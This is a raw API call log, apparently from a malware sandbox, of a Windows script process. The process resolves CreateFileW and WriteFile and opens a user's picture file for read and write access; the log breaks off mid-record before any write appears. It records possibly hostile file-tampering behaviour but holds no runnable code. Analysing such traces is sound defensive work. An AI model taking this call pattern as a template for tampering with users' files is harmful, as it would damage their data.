[0191.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0191.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0191.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0191.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0191.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0191.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0191.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0191.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0191.657] CharLowerBuffW (in: lpsz="byte[50139]", cchLength=0xb | out: lpsz="byte[50139]") returned 0xb [0191.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0191.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0191.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc3db) returned 0xbca008 [0191.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0191.658] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.658] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0191.658] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0191.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0191.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0191.658] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0191.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0191.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0191.658] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0191.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0191.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0191.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0191.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x8e1a20 [0191.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x8e1a20, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0191.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0191.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0191.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0191.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0191.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0191.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0191.659] FreeLibrary (hLibModule=0x75c90000) returned 1 [0191.659] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0191.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0191.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0191.659] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0191.659] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0191.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0191.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0191.659] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0191.660] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0191.660] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.660] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.660] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0191.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0191.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.662] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0191.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0191.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0191.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0191.663] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0191.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0191.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0191.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba078 [0191.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba078, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0191.663] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdzhtnrtuaafiidk.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0191.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0191.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0191.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0191.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0191.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0191.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0191.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0191.664] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.664] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0191.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0191.664] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.664] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0191.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0191.664] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0191.664] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0191.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0191.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0191.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0191.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0191.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0191.664] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0191.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0191.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0191.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0191.665] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0191.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0191.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0191.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9ba228 [0191.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba228, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0191.665] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.665] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0191.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0191.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0191.666] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0191.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.666] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0191.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.666] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0191.666] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0191.666] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0191.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0191.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.666] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.667] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.667] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp", lpFilePart=0x0) returned 0x3b [0191.667] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cfdcdb0, ftCreationTime.dwHighDateTime=0x1d5e4d7, ftLastAccessTime.dwLowDateTime=0xf6dd40e0, ftLastAccessTime.dwHighDateTime=0x1d5e2b9, ftLastWriteTime.dwLowDateTime=0x176fed20, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, 